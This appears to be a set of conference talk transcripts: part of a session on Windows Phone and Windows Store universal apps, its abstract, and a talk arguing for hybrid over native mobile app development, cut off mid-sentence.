likes them. I really like them. If you don't know what portable class libraries is, just a magical type of library that creates one binary which is then shared, which also means that we can't use conditional compilation and we need to abstract away the platform differences, which some people like me prefer over conditional compilation. There has been great improvements now that we can actually share views, assets and resources in a portable class library. And there are also more and more third party open source projects that support portable class libraries. And there are, there's a new package for pretty much everything. It works really well together with universal applications and the shared project that universal application uses. But to be able to use that, we need to have an extension. I'm just going to pin this back. Oops, that was the wrong one. This is extension you want to have if you want to be able to use the shared project in other, if you want to use the shared project in any other way than doing the create new universal application, you will need to add this Visual Studio extension. I think it was released a few days after build, but I did mention it at build. The shared project reference manager. At the end of this session, I have a slide with the screenshots of the Visual Studio extensions and tool I'm talking about. If you want to kind of grab a photo as a reminder for later. This also allows us to use the shared project together with the WPF application, universal application of Windows forms, web forms, whatever you want to use it for. However, of course, you're not going to be able to share the WinRT XAML stack with anything else than the actual applications that support that particular XAML stack. But make sure that you download this one. Otherwise, you're going to bang your head against the wall trying to add other project types. I assume that with time that will be included in a Visual Studio update, I assume, I hope so. Let's talk about the portable class libraries. And as we do that, I like to talk about generally how we've been sharing code before we had universal applications. Because we've been able to share code for a long time and many people are under the impression that this is something new and it's super cool. And of course, it is cool that we have universal applications, but it's just an extension of something we've already been doing for a long time and it's important that people understand that. So there are a few ways you can share code. I mean, if you want to be really cheeky and maybe not super smart, you can go ahead and just copy a file, you know, over to the other project. It's not really sharing. It's kind of inspiration by copying. But a lot of things can go wrong there when you copy and paste, so it's not something we usually recommend. The next step from that would be to create a file somewhere in the solution in the project or wherever. And then you add it as a link to the project, which you do by right clicking add existing item, you select item, I just add something random here. And in the drop down menu, you select Add as link instead of add. This will in the project file link in the files, it's going to seem like it's physically there. And it has a tiny, tiny blue icon that indicates to us that this file is being linked in. This is what universal applications also do, but it's not visualized the same way. After linked files, we got portable class libraries and we had a lot of problems with portable class libraries in the beginning because there was a lot lacking. Portable class libraries can be used to target many, many different platforms. WPF, console applications, whatever you want to target. But it's going to limit access to APIs to the least common denominator. So if you're targeting, for example, Xbox today, you're going to be very limited in what is accessible to you. That is kind of the downside of portable class libraries. You have to handle platform differences without conditional compilation, which is, you know, you use, for example, a constructor injection, use a service locator, you just use some sort of nice little pattern to manage it. So I probably wouldn't do exactly that. I use service locator with adapters, but that's a different story. Now we can actually share XAML as well. And the only reason that we can share XAML now is because we now have the same XAML stack available to us, both Windows Store and Windows Phone, and soon Xbox as well. So I'm going to show, run this example here. I'm just going to set the startup project here. Let's see those two. So I can run both at the same time. Just as a proof of concept. Right. So as you can see, hello from Windows Phone, hello from Windows Store, and there's a button that takes me to a yellow page. And this page is in the portable class library, and I can go back. It works. So there was one option. So we have the portable class libraries. A third way that we can share code today is by using Windows runtime components. Now Windows runtime components we've had for a while as well, as long as we've had Windows runtime, we've had the components as well. They're very limiting, and there are many things you can do and cannot do with the runtime components. There's a course on Pluralsight about that if you're more interested about it. So this would be my least favorite options out of the sharing options. What's really nice about the Windows runtime components is that it's cross language. It's Windows runtime, it leverages metadata, so you can write it in any language available to the component to be written in, and you can call it from any language that is available to call it from. For example, a JavaScript phone application, which I have here. And I'm not going to run it, but I'm just going to show it here to you. So you create a Windows runtime component, you create whatever method class or whatever you want to do, and then inside the JavaScript application after we add a reference to the component, you just call it. And it will go ahead and lowercase the methods for you, so you don't need to change your naming convention. So if you write in C sharp, you just write that's usually would, and you would probably not lowercase a method name. And trust me, it works. I don't want to run it on the every later. I'll show you another example where I actually do that. So these are the runtime components, which brings me to the brokered components. They also introduced brokered components at build, which was really exciting to me, because this kind of been a little bit of a deal breaker with Windows Store applications that you can't use legacy DLLs. And the thing is, like, what do you do if you actually want to call some native DLLs and you want to have them accessible to you in a Windows Store application? What you can do now is you can create a Windows runtime component that uses a proxy, which allows you to call legacy DLLs or other DLLs. And as long as you provide a wrapper for an native DLL inside the Windows runtime component, you can actually use it. Which means that a lot of companies can actually leverage existing DLLs. I'll show you a quick example here. So here's an example of a brokered component that I put together. As you can see, I'm calling some native Windows DLLs. And here is the proxy. It's written in C++. I didn't write it. I'd rather not try to. There's a nice kind of step-by-step guide on MSN, which I hope they've updated, because if you follow the steps, it's not going to work. So it took a lot of messing around to actually manage to get this work. And it's a little bit tedious to make it work, but it might be really, really important for business applications. There is a Visual Studio extension for brokered components, which gives you some templating. But I believe you still need to generate the proxy yourself by adding a post-build event. The broker here basically just lets us dig into these DLLs and call them. And in the Windows Store application, you need to add an extension here to allow the call to the brokered component, as you can see I've added here. Now, you have to sideload an application that does this. Because of the sandboxing model of Windows Store applications, they weren't kind of keen of giving us the option of doing this with WinRT components. But now we can, but it means that application has to be sideloaded. But it gives us all the possibilities in the world. We can actually do whatever we want to do now, as long as the application is sideloaded. And with sideloading of Windows Store applications, it has been a little bit simplified. It's much cheaper now in terms of the licensing and so on. So there's been a lot of improvements there, and I believe they're still improving on the sideloading process of Windows Store applications. Let me run this application. This just sets the cursor position and plays a sound. You probably won't hear the sound. See if you can see the cursor move. So it moved to the left there. It's just a proof of concept. Wouldn't exactly call this line of business application, but yeah. So with all those options that we have available to us, and the broken components are just for Windows Store applications, with all those options available to us, the natural question is, what do I choose? And it's, you can see here that the linked files in the shared project are really similar because basically it's more or less the same thing. I would tend to use the shared project in universal applications in most scenarios together with the portable class library if I aim to target other platforms such as iOS and Android. Portable class libraries work really well with Xamarin, and you can target iOS and Android as well. And my manager, Laurent Pignogne, has an MVVM framework, MVVM Lite, that now works really well with Xamarin as well. Now the WinRT component, as you can see, is quite, quite limiting. So think it through before you decide on actually using that one. Let's talk about deployment, because I started talking a little bit about deployment, but I want to talk a little bit more about that. Packaging has also changed for application. Now there are three different package types for 8.1. Now you have the Zap packages, you have the Apex, and you have the Apex bundle. In regards to resolutions and resources, just chuck it all in there, because only what the user needs on their device is going to be downloaded, that's fine. Applications can now be installed on SD cards, woohoo, but users can opt out, it's not something that we can decide. If we are however worried that the user is going to go ahead and kind of share our application, they're not going to be able to do that because it's encrypted with a device specific key. And the question often comes up, can you add lower version support later on? Yes, indeed you can. There are all these changes to packaging. There's also a lot of changes to the store and also to the developer portal. They have this grand vision of having one store, which I think we all are looking forward to with the one landing page, one registration and so on. I'm not quite sure when that's going to happen, but that is the aim. And that also means that we have a lot of changes in the Dev Center as well. Today, when you want to publish an application, a universal application, you have to link the two together, so you need to reserve a name for both the two applications. That's quite important to know. You still upload the packages separately. You still kind of two separate processes today to publish. The Dev Center, you can now actually cancel submissions. There is much faster publishing. I can hear, I hear it's people who get applications published within a day, which is really nice. There's better reporting. In the Windows Dev Center, you can unpublish applications. You've been able to do that for a while. It's not really that new, because I know I've done it a few times. I joined a hack at home. I whip out some apps to win something, then I remove it from the store later, because I'm embarrassed. And you can say that the publication date and time, but it doesn't mean that the publication is going to happen any faster. It's not like I'm going to see the time and date, and they go, oh, my God, this person is in a hurry, but I get this out. That's not going to happen. I'm going to, I realized that there was one thing I didn't show you. When I showed you the JavaScript application that I wrote with Angular, we were also using the Windows runtime component. And when you use a Windows runtime component, it's all packaged together. I had this question the other day, how that works. No, it's all packaged together. But you can make a Windows runtime component portable. I've never done that myself, but you can if you want to. So these are some of the extensions and tools that I showed you. So these are the three I would get. This is alternative. This actually worked quite well for me up until today. So I'm not quite sure what happened there. But make sure that you grab the BrokerD WinRT component project template, because you are going to need that if you want to do BrokerD components, because you don't want to write them from scratch. You're also going to need to keep an eye on the documentation for the BrokerD component. The shared project reference manager allows you to use the shared project freely without the restrictions of going to universal application and get the shared project like that. And to add a reference to a shared project, let's do that. Give me a Portable Class Library here. Let's see. Oh, this menu is so big, it's just driving me crazy. Let's see. Add... There. Without the visual studio extension, you're not going to see this option there, where you add the shared project. So you're not going to find it in under add reference, and then you find, you know, you find it in the list. It's going to be under the add menu, add shared project reference. Conditional compilation, it's still kind of an experimental stage, it works. I'm not sure how much, how bad breaking can be. The problem I found with it, that it was generating XAML, and it was having merge problems generated with XAML that was generated, which can actually be quite serious problem. So be a little bit careful with it, but definitely a very interesting concept. But otherwise, just use different user controls. You can... I mean, it's a little bit more work, but we can still do it. Now, one more thing. If you really want to take out the universal Windows applications, and you also want to see how to use all the new APIs and so on, there is the universal Windows app samples, which just gives you a lot of different samples that you can go through. I have them here. I'm not going to open each in one of them and go through them, but you have a sample for basically any API that you might be interested in taking a look at. There are many samples on MSDN, so make sure that you take a look at them. And with that said, I think I had such... I was so worried that I wouldn't have time to go through everything that I was going to show that I believe that I'm going to be able to answer questions. I believe so. So I'd gladly take some questions now if you have some. Yes? Yeah. No, it's automatic. Yeah. And it's not something that we can decide on. This is something from the user side. Yeah. Questions? Yes? Yeah, absolutely. The reason why I didn't bring up Blend now, I actually only use Blend for animations and also sometimes when I work with behaviors, because in Visual Studio now we have more or less almost all the Blend capabilities inside the designer because it is basically Blend built into Visual Studio. So yeah, Blend very much, so good support and everything I've shown here with the device window and navigation menu and everything you will also find in Blend. Yeah. I have not tried that, so I actually don't have an answer to that. There isn't any, I wouldn't say there's any one way to go about it really depends on your preference. Yeah. How can you leverage Cortana's capabilities into your own applications? I have actually not tested Cortana yet as far as I know from everything that I've seen because I haven't been working with any project with speech after build, but I did watch the sessions they had on it and from what I saw the examples are still the same. It's just an improvement on what we get out of it, but I didn't see that we had any extra access or capabilities beyond what we've had from the previous release. I can however be wrong. I have to admit that in particular with speech I am not 100% up to date with Cortana. Any more questions? It's a quiet crowd. All right. The first two people coming up here are interested in programming for Windows Store applications. We'll get a book and if you'd like to buy the book at discounted price, I have cards here and through a site monthly subscription free full access unlimited here as well. Feel free to ping me on Twitter. I don't provide my email. I've gotten some of the really weird emails, so since this is recorded, I'd rather not have my email on the site, but write in a comment on my blog or just tweet to me and I'll give you my email. Okay. Thank you.
Earlier this year there were many improvements to the Windows Phone and Windows Store platforms and this session gives you an overview with plenty of demos over the changes covering native DLL calls with brokered components, groundbreaking changes to Windows Phone (I’ll demo a JS Windows Phone app using Angular.js that incorporates a cross language Windows Runtime Component written in C# shared with a Windows Store App). Of course API changes will be covered, not to mention Universal Apps and the major changes in Portable Class Libraries that somehow went unnoticed at BUILD. Besides all that we will take a brief look at side loading improvements, changes you should know about in regards to the submission and deployment process- and the future of the Store and developer portal. Throughout the session I’ll recommend VS extensions that might come in handy, share samples and other resources that will guide you further. This session is intermediate and assumes previous knowledge of the platform. Come well rested, it’s a dense session with a high pace.
10.5446/50547 (DOI)
Can you guys hear me okay? Yeah, good? All right. So good morning. Welcome to the first session of NDC 2014. Glad you guys made it out. My name is Jeff French. I am a mobile app developer. Been doing mobile apps exclusively for about a year now, off and on for a few years before that. So let's start by kind of finding out more about you. So how many people in this room have built a mobile app before? Okay, maybe half. Out of those, how many built a hybrid app? Okay, a few. Native app then? Okay. So how many of you are about to start a mobile project in the next six months? Okay, looking for some timely advice? Great. So we're going to go ahead and conduct this session in a little bit different fashion. I'm going to start at the end and then we'll go back through the beginning and the middle and figure out how we got to the end. So let's do that now. There you go. If what you came here to here was someone stand on stage and tell you to choose hybrid or choose native, this is what I'm going to tell you. If that's all that you were after, great. You got time to go catch somebody else's session. If you want to know why, I'm going to tell you that. I'm going to stick around and we'll go through it. And I'll take you through. You know, my experiences in delving into hybrid app development and why I think it's the right choice. So for starters, am I a hybrid fanboy? Yeah. Have I ever built a native app? Nope. And does that make me grossly under qualified to advise you on this subject? Maybe. But no. Really, it just means that I have already kind of done a lot of this homework. I've, you know, I'm going to let you know my experiences in spelunking through all these Google results and sifting through all these blog posts and trying to figure out, should I invest in learning a native technology or make use of the existing web skills I already have, right? Like, I'm going to be a hybrid fanboy. I already have, right? Like the upfront trade-off seems pretty obvious, right? Because you say, well, if I've already got web skills and I can use those technologies to build a mobile app, then it's going to be better, right? But that may not be true. Now, I've gone through this kind of research cycle, I guess, a few times over the last three or four years. And every time I've come to the same conclusion, I always keep coming back to hybrid apps. And every now and then I say, yeah, you know, well, maybe, and then I go back and I start thinking about it again and I start doing the research and trying to figure out if there really is an advantage to going native, and I always come back to choosing hybrid. So TLDR, choose hybrid. So let's go back to the beginning and start by kind of defining some things. What is a native app? What are the components of a native app? You're going to find a native app is going to have a platform-specific language. You're going to be using a different language for pretty much every platform that you need to develop for. So if that's iPhone, Android, Windows phone, there you go, three languages. Three UI designs that you have to build. Three UI design languages, I guess you could call them, that you're going to have to learn. Cocoa and XAML and whatever that thing is on Android. You're going to have to go through and build out a UI for each one of these platforms that makes sense for your app. And you're going to have to build it three times, four times, however many platforms you've got to go to. And as you're building the same app to solve the same problem for your end users or provide the same value for end users on all these different platforms, when you're building a native app, do you know how much code reuse you're going to get? Zero. You're going to have to do everything on all of the platforms that you need to deploy to. You're not really going to be able to share much logic. I mean, yeah, you might say, well, if I'm building something that's more of a thin client and I can put the logic on the server through an API, yeah, absolutely. And that's going to be true of any mobile app you build hybrid, native, or otherwise, and really any other app. If you can centralize some of that logic into an API, that's definitely going to get you some more reuse. But on native apps, your actual device-specific code is not going to get much shared usage. So these things here, Objective-C slash Swift now, if you saw yesterday's announcement or two days ago announcement, Java, XAML, if any of those terms give you heartburn, if you have built something with XAML for Windows Phone 7 and now you suffer from post-traumatic shock syndrome, native might not be the best choice for you. OK? So let's look at the anatomy of a native app. Here's what you're going to end up having. On every one of these, in some form or another, you're going to have this stack of view that has your UI, some type of a view controller that's going to present that UI, some business logic that's underneath it. And as you can see, they're in silos. We're not sharing anything across them. We're having to solve the same problem multiple times. All right? So on here, that's your problem. OK? In each one of these, your problems are being solved multiple times. OK? Now, you're going to be challenged with trying to build a somewhat consistent UI for your users. That makes sense. If you've got users who switch from iOS to Android and they're using your app, you want them to understand how to use your app already. They shouldn't have to relearn it, just because they're on a new platform. You're going to have to have feature parity, not only in your initial development, but in your ongoing development as you continue to try to add value to your application. You've got to add it on three platforms, considering that's all of the market right there. But if you're doing BlackBerry, have fun with that. You're going to have to solve that same problem, every business problem, every UI problem, all the great stuff that Luke was just talking about out there with designing for good user experience on a mobile device. Well, now you've got to figure out how to replicate all of that across all the platforms that you go to. OK? So you're going to have to solve your problem n times, where n equals the number of platforms you need to deploy to. And you're also going to have to overcome multiple learning curves. Unless you were already born an expert in all three of these mobile platforms, you're going to have to go out and learn these technologies. Or you're going to have to go out in higher teams that already have these technologies under their tool belt and can be effective at building them. So what's a hybrid app? Well, one thing all hybrid apps tend to have in common is a native web view. There's a web view in every mobile SDK. They've got some way for you to display a web page. And hybrid apps take advantage of that by having a native web view that lets you present an HTML and CSS and JavaScript-based UI inside that web view. And it doesn't look like a browser. There's no Chrome around it. It's just a full page most of the time, unless you want it to have a toolbar. They're going to have a JavaScript API that's going to let you access native functionality. So when you want to get to native device capabilities, such as a camera or access to an NFC chip or GPS or the contacts on a phone, they're going to have a JavaScript-based API that's going to let you access that in a consistent manner across all the platforms that you deploy to. And as discussed, we're going to have an HTML5 and CSS-based UI. And JavaScript can be in your UI as well. And that means that if you already know how to build web pages, which quick show of hands, who knows how to build web pages? Yeah? Pretty much everybody. That's good. Congratulations. You already know how to build a UI for a mobile app then. Are you going to have to learn some mobile UI paradigms that make use of HTML5, of course? Maybe you already know some from building mobile web apps. But the really nice one is your code reuse. When you choose to go down the path of hybrid apps, you're going to get close to 95% to 100% of code reuse across your platforms. And that's going to skew more toward the high end of that number for most apps. Now, you're not going to get that with a native app. So let's look at the anatomy of a hybrid app. They're going to look like this. You're going to have a native web view and native API and a unified JavaScript API that goes across all those. And then you're going to have JavaScript-based app logic, and HTML and CSS-based UI sitting on top of that. So here's how that breaks down. Those top two, those are your problems. All the bottom ones are somebody else's problem now. Not yours. You're going to lean on a framework, such as PhoneGap or Senka Touch or something, where they are building out the native web view. And they are integrating the native APIs and exposing them via a common JavaScript API. And all you have to do is write one code base. Whenever you want to get a picture from the camera, you just say navigator.camera.getPicture, depending on whatever kind of framework you're using. And whether that code is running on a Windows phone or an iOS device or an Android device, it's just going to work. And you don't have to care. All those differences in the platform are nicely and neatly abstracted away. So you don't have to worry about them. Because last time I checked, unless you're actually building one of these native frameworks, the details of how to get a picture from a camera on three or four different platforms is probably not the business case that you're solving. It's probably not what your app is intended to do. If your app's primary function is to figure out how to get a picture off of a camera, OK, yeah. Maybe it makes sense for you to write that native code. But probably not. Probably you're building some sort of a social app or maybe a line of business app. And you need to grab the user's location for something. You don't want to have to worry about how to write that on six different platforms. You just want to have one nice call that says, well, just give me the location. This is very similar in concept to something like the.NET framework. You can go ahead and write lots of Windows-based code in C or C++ that makes use of native low-level Windows APIs. Or you can use the.NET framework and be way more productive. And then you can also know that some other engineer who probably has more time and experience in optimizing native API calls in the Windows framework has optimized that and exposed it to you in a good way in the.NET framework for most of your use cases. That's the same concept with the hybrid app. You're kind of standing on the shoulders of giants by letting a whole team of other developers who work on something like, say, PhoneGap that have a lot of experience in building this native piece of the code so you don't have to. And it's also going to come back to, see how we've got JavaScript app logic up there? That means that you notice it's one big pink block across all the platforms. You have to solve your problems once. And yes, some of those are going to be solved, like we said before, at the API level up on your server. But if it's a local device application, if it's something that's offline and you don't have access to a server, it doesn't make sense to have an API, you still only have to solve your problems one time. And the same goes for your UI problems as well. When you start designing out a UI paradigm, you're going to be able to reuse that across platforms and then just tweak it ever so slightly as needed for each platform. There's a gray area that exists between native and hybrid. So this gray area is what we would call transpiled applications. A transpiled application is going to be something that you write code in one language and it gets transpiled down into another language. So examples of that might be something like, say, Xamarin, where you write C sharp and it gets transpiled down into Java or Objective C or whatever else to run on all these different platforms. Now, in these transpiled apps, you're still going to have some of the advantages of kind of like a hybrid app in that there's going to be native device APIs that are exposed in a common language. Hybrid apps do it with JavaScript. Some of these transpilers do it with JavaScript, like, say, AppCelerator. Some of them do it with C sharp like Xamarin. You're going to have common business logic across your platforms. So once again, we're getting that nice advantage here of being able to solve your business problems with one code base one time and have it work on all the platforms, which is very nice because as a developer, you probably, like I do, adhere to the kind of philosophy that, well, if I have to do something more than once, let's automate it because I don't want to do it three times. Same thing with building a native app. Why solve the same problem three or four or five times when you can solve it once by using a better set of tooling? Now, most of these transpiled applications, you're going to have to build a platform-specific UI. Now, these are going to be usually in the native UI language and tooling of the platform that you are trying to target. So typically, you'll have to build out a cocoa-based UI for iPhone. You don't have to do your Android thing. You don't have to do XAML. Now, that's not 100% true. Some of them, especially if you saw the release of Xamarin. Forms, they've released a lot of nice cross-platform UI components. But you'll probably still have to dip down into native UI stuff in order to use most transpiled mobile app frameworks. So code reuse. Transpiled apps do get a lot of good code reuse. You're still probably going to get, on average, I'd say, about 70% to 80% code reuse by going this way. Most of your business logic is going to be there. It's going to mostly be UI code that you have to, that you're not going to be able to actually use between the things. Now, that still leaves you in that area of having to solve these UI paradigms on your own. To solve these UI paradigms on multiple platforms. So you're still going to have to figure out how to make this work on each one of these platforms and how to plug it in to your transpiled app framework. So like I said, some examples of the transpiled apps would be Xamarin, AppCelerator, Titanium. I haven't built a full app with either one of these things. I've maybe done about Hello World on each one. And they definitely have some potential. But again, I've always fallen back to doing a straight up hybrid app with something like PhoneGap. So when should you choose native? I've spent this whole time up until now telling you, well, you shouldn't. You should just choose hybrid, right? But that's not always going to be the use case, right? There are times where a native app is the way to go. One of those times is when you only care about one platform. If all you care about is having your app on Android, then whatever, just build it on Android. If your app is highly dependent on a feature that only exists on one platform, right, for a long time, NFC was only on Android. And if you were building some sort of a mobile wallet app that used NFC for payment or something like that, OK, build it on Android. There was no reason to go to iOS or Windows Phone at that time. Or the big one is when your app uses heavy 3D rendering, you're building a game or something that's going to have a really, really intense 3D UI, you're probably going to get a lot better performance by going native with that. But the caveat is none of those reasons mean that you have to choose native. You can do all of those things with a hybrid app. I've shipped many hybrid apps that are only on iOS. But it was faster and easier and cheaper for me to build it using PhoneGap and some other UI frameworks and ship it. And now if the client comes back to me and says, oh, man, we got to go Android and say, OK, cool. We can do that tomorrow. Just got to run a build script. We're done. And they go, oh, wow, that's cool. 3D rendering, you can do a lot in the browsers and web views that are available today. Most of them have OpenGL. And you can build a lot of really intense 3D games using nothing but JavaScript. You can also do this in transpiled apps. I talked to a guy who had used, I think he had used Xamarin and built a fully 3D UI. And he didn't care about having to redo his UI on every platform because he wasn't making use of any native stuff anyway. It was all his own UI. So he was able to reuse one set of UI components across all the platforms as well because of the way he had to build it. So why is hybrid good for the 95% use case? Most of the time, you're going to find that a hybrid will probably suit your needs. So a lot of people are building line of business apps, which end up being lists. You don't need a native app for that. You can do nice, rich UI in a hybrid app as well. So hybrid apps are good because they're going to have native functionality available to them via plugins. If there is something that you can't do in HTML and CSS, you can write a program that's not available to you. In HTML and CSS, you can write a plugin for it. But even better than that, most of these frameworks already have big plugin ecosystems where other people have already contributed plugins that will probably meet your needs, or at least serve as a good starting point for writing your own plugin. Some examples of that would be things like barcode scanners, GPS contacts, camera, NFC, Bluetooth. There are tons and tons. Facebook and Twitter integration for authentication, being able to build SMS text messages in the device's native format and actually send them out. There are tons and tons and tons of plugins out there that will give you the native access you need. And even if you have to write your own plugin, you're now only having to write and maintain this much platform-specific code on each platform instead of 100%, instead of the whole thing. The other reason that they're great is that there are a lot of frameworks out there to help you build good, close to native, or fully native-looking UIs on each platform. And also give you a lot of the same native behaviors people expect on your platforms. A few examples of this are like Ionic, Senka Touch, Kendo UI. Some of these take different approaches. I've been using Ionic to build a lot of apps lately, and it's been really, really nice. It's heavily integrated with AngularJS, and single-page apps are great for building mobile apps. So Ionic gives you a lot of cool stuff, such as behaviors, in that they've got AngularJS directives to build out a list that automatically has swipe to edit and delete, and have all those native UI paradigms that your users are already accustomed to available to you without you having to write all that extra code to figure out how to do it. And it's going to work on all these multiple platforms. And then because it's just CSS and HTML that's used to style the UI, now you can tweak it and make it look right for your brand and match what your users are going to expect. OK? A phone gap has always been my hybrid platform of choice. And they have a ton of plugins. Now, a phone gap plugin and most hybrid app plugins are going to consist of the same thing. You're going to have native code written in the platform that you are developing for. So Objective-C or Swift for iOS, Java for Android, C-Sharp for Windows Phone. And on top of that, you are going to expose a JavaScript API for your plugin, which then gets kind of exposed through that common JavaScript API that we saw on the slide before. So this lets you build out a scenario where you only have to write, like I said, a little bit of code for a given platform and still be able to access full native functionality in that area, which is way better than writing it for every platform. So if any of you have already been doing any research into hybrid versus native, you've surely come across a ton of stuff on the internet about how hybrid apps don't perform as well as native apps. This is one of the first things that I came across when I started looking into it. I said, oh, that seems too good to be true. And sure enough, I found a whole lot of blog posts telling me, yeah, it is too good to be true. The hybrid apps don't perform well. Well, I think you're going to find, if you go and look at that, that, A, most of that is based on hybrid technologies that existed around 2010 when they kind of started really coming into popularity. They weren't that great. Like a lot of software, they didn't come out of the gate killing it. They took some time to iterate and figure out how it was the best way to do things. And I can tell you that the hybrid solutions that are available today, this is not a statistic that I have a benchmark on, but in 90% to 95% of the use cases, they perform just as well as native apps. So when you are going out and conducting your own research on this topic, please make sure you check the dates on those blog posts and really kind of go investigate the frameworks that you're looking at and figure out, well, have these people made any progress in the last four years? I sure hope they have. Now, you're also going to come across the Facebook story. Facebook, very famously a couple of years ago, ditched their HTML5 apps and went to native apps. And I even saw a quote from Mark Zuckerberg that said that betting the farm on HTML5 was one of the worst strategic decisions that the company ever made. Maybe it was just feeling pressure from the IPO. I don't know. But I will say this, should you do the same because Facebook did? No. I've done a lot of looking into that because it was a really big driver for me when I first started looking at hybrid apps and saw that Facebook was ditching their hybrid web view-based application to go native. I said, oh, man, if it's not good enough for Facebook, it's probably not good enough for me either. Well, first thing is then I remembered, oh, yeah, I don't have Facebook's problems yet. One day I'll have billions of users on my app and then I'll have Facebook-level problems. Today I don't. Then I came to the realization, if I built a hybrid app and got to Facebook scale, hopefully I would be making enough money that I could hire teams of engineers on each one of these platforms to build me native apps, just like Facebook did. If not, then maybe there's more of a problem with my business model. Maybe I have done something wrong upfront that caused this problem. Now, I don't know a whole lot about Facebook's actual implementation, but from what I've read and what I gathered, I was able to draw some pretty interesting conclusions. Remember this slide? Remember how I said that the things at the top are your problem and the things on the bottom are somebody else's problem? Well, this rule only applies if you actually choose a mobile framework, like, say, PhoneGap or Senka Touch, where other engineers are building the native components and giving you a place to plug in your HTML and CSS. Now, from everything I've read on the Facebook situation, they didn't take this approach. They decided they would build their own native container with a web view to display their HTML stuff in. If you're going to go that far, you may as well build a native app, because now you are in charge of all of the native code that displays your web view and making sure that it's patched for security and that it's performing well and that you're keeping up on all the SDKs. You've already taken on the overhead of native app development at that point. You've already had to learn the language. You're probably not getting a whole lot of gains out of doing a hybrid app if you are building your own web view on each platform. Now, the other thing with regards to our performance myth is I will tell you right now, having never even built a native app, that it's just as easy to write crappy code in a native language as it is to write crappy code in JavaScript. Ever been is easy. In fact, if you are maybe an experienced web or JavaScript developer and have never touched a native language before, I would say it's probably even easier to write crappy code in a language that you're new to. I mean, how many people here have spent a lot of time learning how to optimize your web view? How many people have learned how to optimize for the platforms that you build for? If you write.NET code and C sharp, you've probably learned a lot over your years of experience. That's why we look for developers that have five plus years of experience for things. Because we know that they've already learned, or hopefully have learned, how to write better code in that language and how to get more performance out of it. So if you have already spent a lot of time, especially if you're a web developer who has already spent a lot of time really good at optimizing your HTML and doing smarter and more efficient DOM manipulation and writing good effective CSS selectors and writing good high-performance JavaScript, you're probably going to be able to write a good, well-performing hybrid application using those skills. Those skills are going to transfer right over into your hybrid app development. However, if you have never written Objective-C before and you file new in Xcode and start building out a native app, there's a very good chance that you're going to do a lot of things wrong or do a lot of things poorly. It's the old saying that the first step to getting good at something is sucking at something. Well, oftentimes in mobile app development, time to market is critical. If you can get out there first with your idea, you're going to gain some mind share and some market share. Well, if you've got to go build something really, really fast on three brand new platforms that you've never touched before, there's a good chance you're going to put out crap. But if you can leverage existing skills that you've already spent time developing, you've given yourself a much better chance of putting out a good, well-performing application. So our conclusion here is that you should choose hybrid. I told you I was a fanboy. Now, as we've said, there's a lot of reasons that you might choose something other than hybrid. But if you're going to go down that path, I really, really want for you guys to go down that path with your eyes open. Understand the caveats, because it's easy when you're jumping out into a new language to find a lot of let's get started. Here we go. Quick start tutorial on Android development. And it's going to have you build Hello World. And you're going to say, OK, that wasn't too bad. I mean, I had to struggle through some tool installations and some configurations and maybe a little bit of language learning stuff. But I got Hello World out the door in a day or less, so it can't be that hard. Just stop to remember the first time that you wrote Hello World in your favorite language. You wrote it, and you probably learned a lot since that first Hello World. So don't throw that out the door, especially if your language of choice is already JavaScript. Don't throw away that skill set, just because some random blog post from 2011 says that Facebook had a problem with a web view. That's not really a good reason to go that route. So at this time, I'd like to go ahead and just open it up for questions. Generally a lot of questions at the end of this talk. Go ahead. OK, great. So the question is, out of the stuff I've mentioned, what kind of concrete examples can I give of stuff that I've used? As I said earlier, every time I've looked at stuff, PhoneGap has been my tool of choice for building these hybrid applications. And it's the only thing that I've actually shipped something to the app store in. And it's been my experience, especially since PhoneGap went from 2.9 into the 3.0 era. They made huge, huge gains in the way that they handle their framework and performance. And it's gotten us a lot closer to a native app type experience. As far as Xamarin, like I said, I haven't done anything beyond, say, Hello World using Xamarin or Accelerator Titanium. So I can tell you that my experience in those, in writing Hello World, was such that I felt like I wasn't going to get enough gains out of investing in learning their system. With PhoneGap specifically, I found that I didn't have to learn very much new stuff beyond HTML and CSS and JavaScript. It was very much about building a web app that could run on a device. But so I don't have a lot of good, I don't have a lot of good negative experiences to tell you about because I don't waste my time on negative stuff. When I feel like there's nothing there, I bail out. But excellent question. Did I answer that? OK, great. So any more questions? Yes? What are some high profile? Excellent, excellent question. I actually had a bullet point on here, and I forgot to bring it up. So with PhoneGap, I was just looking this morning, and a couple that I found as high profile examples were the BBC in the UK did an Olympics app for the Summer Olympics. Or no, maybe it was just recently, Winter Olympics, whichever one. I don't know, I'm not in the UK, so I didn't get to use the app. However, it was featured on PhoneGap's featured app page to show that the BBC had built this thing. And it looked beautiful. And it was available on iOS, Android, and BlackBerry. That was the platforms they decided were important to them. And this app had 24 live streaming feeds of the Olympics. It had social integration, it had medal rankings, it had a page for every sport, a page for every country where you could go see all this stuff. And obviously, if it's put out by the BBC to allow people to use it, I don't know what their usage numbers were, but I got to guess, there was a whole lot of usage, a whole lot of simultaneous usage. And again, the thing you remember on mobile apps is simultaneous usage doesn't really amount to anything except for server load. Everybody's using their own device. But another one that I see, has anybody here ever used Untapped? No? Craft beer drinkers? No? OK. But it's big in the States anyway. And it's another one that is available on iOS, Android, and Windows phone, and has great experiences. And to be honest with you, I've used the app for probably a year now. And until I looked it up and noticed it on the Phone Gap page, I had no idea it was a hybrid app. Like, I've been using it every day, or not every day, but a lot over the last year, and had no idea that it was a Phone Gap-based application. And I was like, oh, OK, cool. Well, that's good to know. So now there are other, one of the ones that I here pointed out a lot as an example of hybrid apps, but it's not Phone Gap, to my knowledge, is Instagram. Now, Instagram is still, as far as I have guessed, in the same boat that Facebook was with their HTML implementation. I believe that they have a native app with their own web view, and so they load up native navigation, and then the actual pictures and posts that you view are loaded in a web view. Now, again, they have taken on the task of writing, essentially, a native app. Probably the only reason they showed in a web view is because it's a real easy way to load a bunch of pictures and text into your app, because those are coming live from the web, which is actually a really good, important point to bring up. When you are building a hybrid app, especially with something like Phone Gap, a common misunderstanding or pitfall that people get into in the beginning is they say, well, I've already got a mobile website, so I can just take Phone Gap and create this little container that will load up the mobile website I've already got on my server, and it's just going to work. No, it's probably not. Phone Gap is going to require at least the first bit of HTML to be on the device. And you're going to get the best experience by serving all of your JavaScript and HTML and CSS from the device itself. If every time a user clicks on something in your app, it has to make a web request, just like they're in their browser. It's going to feel like a website, not a native app. And that's one of the areas where, when you go down that path, it creates a hybrid app that doesn't feel native. Now, one of the advantages of a hybrid app is that we've all heard the horror stories about it taking two and three weeks to get something approved on the Apple App Store, and you've still got to get approval to do it and everything. A hybrid app can actually give you a little bit of a way around that, in that you can ship one version of your application, but on startup, you can go download. You're free to just go download fresh HTML, CSS, and JavaScript from your server. So you can build what amounts to a local 